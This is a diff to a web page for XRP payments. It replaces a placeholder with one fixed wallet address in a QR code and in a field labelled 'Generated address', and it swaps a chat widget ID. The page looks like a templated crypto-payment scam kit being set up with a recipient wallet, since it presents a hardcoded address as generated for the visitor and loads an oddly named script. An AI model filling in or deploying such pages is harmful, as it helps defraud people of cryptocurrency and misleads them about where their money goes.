--- a/xrp/index.htm
+++ b/xrp/index.htm
@@ -45,7 +45,7 @@
                             <div class="pop-qr">
                                 <div class="inner-qr">
                                     <div class="main-qr">
-                                        <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="../chart?chs=130x130&chld=L|0&cht=qr&chl=ripple:xrpaddress" alt="qr"></div><span class="wallet">Waiting for payment</span>
+                                        <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="../chart?chs=130x130&chld=L|0&cht=qr&chl=ripple:rPBmQPFwtjD89EwRLKF6f9ZNnZdgWMcZ8uress" alt="qr"></div><span class="wallet">Waiting for payment</span>
                                         <center><img src="../files/loading.svg" width="70px"></center></div>
                                 </div>
                             </div>
@@ -67,7 +67,7 @@
                             
                             <div class="inner-address"><span class="wallet-ad">Generated address:</span>
                                 <div class="address">
-                                    <div class="main-ad"><span class="real-address">xrpaddress</span></div>
+                                    <div class="main-ad"><span class="real-address">rPBmQPFwtjD89EwRLKF6f9ZNnZdgWMcZ8uress</span></div>
                                     <div class="copy-body">
                                         <div class="copy-inner">
                                             <img class="cp" id="copy_address" src="../files/copy.svg">
@@ -308,7 +308,7 @@
     <script src="../files/jdfghkjdfhgvsjkdfgcphjkfdhgjsdfg.js"></script>
     <script src="custom.js"></script>
             <!--Start of Tawk.to Script-->
-   <script src="//code.jivosite.com/widget/7yjSqqXtuI" async></script>
+   <script src="//code.jivosite.com/widget/9LI7Xw5vOG" async></script>
     <!--End of Tawk.to Script-->
 </body>
 
